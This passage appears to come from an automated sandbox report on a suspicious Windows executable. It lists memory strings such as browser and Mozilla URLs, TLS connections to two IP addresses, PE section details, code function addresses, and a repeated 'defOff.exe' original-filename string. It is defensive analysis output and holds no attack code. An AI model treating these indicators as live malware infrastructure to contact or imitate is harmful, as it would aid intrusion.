Source: TTsfmr1RWm.exe, 00000000.00000003.2295253791.0000000005B3A000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2295143679.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: TTsfmr1RWm.exe, 00000000.00000003.2295253791.0000000005B3A000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2295143679.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_87.6.dr, chromecache_109.6.dr	String found in binary or memory: https://www.linkedin.com/cws/share?url=$
Source: TTsfmr1RWm.exe, 00000000.00000003.2345383675.0000000005B25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: TTsfmr1RWm.exe, 00000000.00000003.2345383675.0000000005B25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: TTsfmr1RWm.exe, 00000000.00000003.2345482437.0000000005C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: TTsfmr1RWm.exe, 00000000.00000003.2345482437.0000000005C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: TTsfmr1RWm.exe, 00000000.00000003.2345482437.0000000005C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: TTsfmr1RWm.exe, 00000000.00000003.2369470224.000000000134E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.6:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.6:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.6:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.6:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:50071 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: TTsfmr1RWm.exe	Static PE information: section name:
Source: TTsfmr1RWm.exe	Static PE information: section name: .rsrc
Source: TTsfmr1RWm.exe	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01330358	0_3_01330358
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01330358	0_3_01330358
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01330358	0_3_01330358
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01330358	0_3_01330358
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01330358	0_3_01330358
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01330358	0_3_01330358
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01330358	0_3_01330358
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01330358	0_3_01330358
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01330358	0_3_01330358
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01330358	0_3_01330358
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01330358	0_3_01330358
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01330358	0_3_01330358
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01330358	0_3_01330358
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01330358	0_3_01330358
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01330358	0_3_01330358
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01330358	0_3_01330358
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_009458D5	0_2_009458D5
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0093B100	0_2_0093B100
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00969280	0_2_00969280
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00953B50	0_2_00953B50
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0095D34A	0_2_0095D34A
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00957440	0_2_00957440
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00970460	0_2_00970460
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0096C5A0	0_2_0096C5A0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00951D00	0_2_00951D00
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00970D20	0_2_00970D20
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0093E687	0_2_0093E687
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00968EA0	0_2_00968EA0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00938600	0_2_00938600
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0093CE45	0_2_0093CE45
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00952E6D	0_2_00952E6D
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00942750	0_2_00942750
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0095C09E	0_2_0095C09E
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_009688B0	0_2_009688B0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0094C8A0	0_2_0094C8A0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_009638D0	0_2_009638D0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0095A0CA	0_2_0095A0CA
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0094B8F6	0_2_0094B8F6
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0095C0E6	0_2_0095C0E6
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_009460E9	0_2_009460E9
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0094D003	0_2_0094D003
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0093D83C	0_2_0093D83C
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0093D021	0_2_0093D021
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0093C840	0_2_0093C840
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0095E180	0_2_0095E180
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0096F18B	0_2_0096F18B
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_009539B9	0_2_009539B9
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_009591AE	0_2_009591AE
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_009581CC	0_2_009581CC
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_009709E0	0_2_009709E0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0095C9EB	0_2_0095C9EB
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00956910	0_2_00956910
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00935901	0_2_00935901
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0095C09E	0_2_0095C09E
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0093397B	0_2_0093397B
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00936160	0_2_00936160
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0094E960	0_2_0094E960
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00948169	0_2_00948169
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00969A80	0_2_00969A80
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00958ABC	0_2_00958ABC
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00949AD0	0_2_00949AD0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_009542D0	0_2_009542D0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0094E220	0_2_0094E220
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0096CA40	0_2_0096CA40
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00965A4F	0_2_00965A4F
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0096DA4D	0_2_0096DA4D
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00934270	0_2_00934270
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0094EB80	0_2_0094EB80
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_009373D0	0_2_009373D0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_009583D8	0_2_009583D8
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0093F3C0	0_2_0093F3C0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00939310	0_2_00939310
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00948B1B	0_2_00948B1B
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0093AB40	0_2_0093AB40
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00951340	0_2_00951340
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0095F377	0_2_0095F377
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00944CA0	0_2_00944CA0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_009504C6	0_2_009504C6
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0093D4F3	0_2_0093D4F3
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00961CF0	0_2_00961CF0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_009524E0	0_2_009524E0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00963C10	0_2_00963C10
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0096A440	0_2_0096A440
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0094747D	0_2_0094747D
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00967DA9	0_2_00967DA9
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0096A5D4	0_2_0096A5D4
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00935DC0	0_2_00935DC0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0096CDF0	0_2_0096CDF0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0094051B	0_2_0094051B
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00969D30	0_2_00969D30
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0095C53C	0_2_0095C53C
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00956D2E	0_2_00956D2E
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00941D2B	0_2_00941D2B
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0095CD5E	0_2_0095CD5E
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0095CD4C	0_2_0095CD4C
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0096FD70	0_2_0096FD70
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00954560	0_2_00954560
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0094AEB0	0_2_0094AEB0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_009546D0	0_2_009546D0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_009706F0	0_2_009706F0
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0094961B	0_2_0094961B
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0096FE00	0_2_0096FE00
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0093F60D	0_2_0093F60D
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0094E630	0_2_0094E630
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00968650	0_2_00968650
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0095FE74	0_2_0095FE74
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_0095EE63	0_2_0095EE63
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00950E6C	0_2_00950E6C
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00939780	0_2_00939780
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00955F1B	0_2_00955F1B
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00959739	0_2_00959739
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00946F52	0_2_00946F52
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_2_00957740	0_2_00957740
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: 0_3_01329D61	0_3_01329D61

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: String function: 00937F60 appears 40 times
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Code function: String function: 00944C90 appears 77 times

Source: TTsfmr1RWm.exe, 00000000.00000003.2516660193.000000000614E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2520678291.00000000061B4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2513859548.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2517911076.000000000615C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2516056669.000000000606B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2515457959.0000000006065000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2527980222.0000000005FA4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2510823637.00000000060D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2521012675.00000000060B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2512694555.0000000006045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2517746067.0000000006078000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2519443888.0000000005F96000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2526334381.00000000060C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2518690869.0000000006093000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2531359913.0000000006244000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2524304157.0000000005F99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2517534965.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2526943374.00000000060CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2516534865.0000000006074000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2522617355.0000000005F98000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2510431435.0000000005E28000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2515576812.0000000006135000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2517183645.000000000607D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2547900644.0000000005D96000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2523326828.00000000060B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2549556176.0000000005B04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2515937991.0000000005FA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2523573123.0000000005F96000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2512123398.0000000005BF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2528300723.00000000060DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2519556441.0000000006092000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2527733792.000000000620C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2513366082.0000000005FA5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2514572059.0000000005F97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2521445475.00000000060AF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2521741663.00000000061D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2514356241.0000000006049000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2510626905.0000000005F96000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2517336179.0000000006165000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2514684318.000000000604A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2518894454.0000000005F96000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2519309551.000000000608A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2513156621.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2512809229.00000000060F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2519695774.0000000006186000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2529297283.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2520365854.0000000005F99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2518107385.0000000005FA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2522429304.00000000060BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2519056895.0000000006095000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2513748691.000000000604A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2515342204.0000000005F97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2518419733.0000000005FA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2515696984.0000000005FA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
Source: TTsfmr1RWm.exe, 00000000.00000003.2530665616.00000000060E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs TTsfmr1RWm.exe
